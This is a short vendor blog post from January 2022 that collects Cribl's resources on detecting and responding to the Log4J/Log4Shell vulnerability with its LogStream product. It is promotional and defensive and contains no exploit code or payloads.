Detecting and Preventing Log4J Attacks with Cribl LogStream

Nick Heudecker
Written by Nick Heudecker

January 5, 2022

Shortly before the December holidays, a vulnerability in the ubiquitous Log4J library arrived like the Grinch, Scrooge, and Krampus rolled into one monstrous bundle of Christmas misery. Log4J maintainers went to work patching the exploit, and security teams scrambled to protect millions of exposed applications before they got owned. At Cribl, we put together multiple resources to help security teams detect and prevent the Log4J vulnerability using LogStream. To collect everything in one place, here’s what we put together:

Blog Post: Catching Malicious Log4j/Log4Shell Events In Real Time with LogStream

This blog from Igor Gifrin breaks down the exploit, then goes into how you can use LogStream to route malicious Log4J attempts to a safe location for investigation and remediation.

Live Stream: Using LogStream to Help with #Log4Shell Detection, Enrichment, and Incident Response

Ed Bailey and I did a live stream where we went deeper into LogStream’s features to not only detect Log4J attacks, but also how to enrich inbound data with GeoIP information, as well as how to use LogStream’s lookup capabilities to quickly update a database of compromised hosts, or indicators of compromise (IOCs).

Solution Brief: What is the Log4J Vulnerability? 

Since IT executives are busy, we also put together a one-page solution brief describing the vulnerability and how LogStream’s unique features help security teams respond to the threat.

Video: Detecting Log4J/Log4Shell exploits with LogStream

Lastly, we did a quick video summarizing the exploit, the scope of the threat, and where Cribl LogStream fits in.

If you’re working on the Log4J vulnerability and need a hand with LogStream in your environment, please drop into the Cribl Community Slack. We’re here to help. If you need LogStream, it’s available for free either in the cloud or as software, and our sandboxes offer a great way to try the product with sample data.

Questions about our technology? We’d love to chat with you.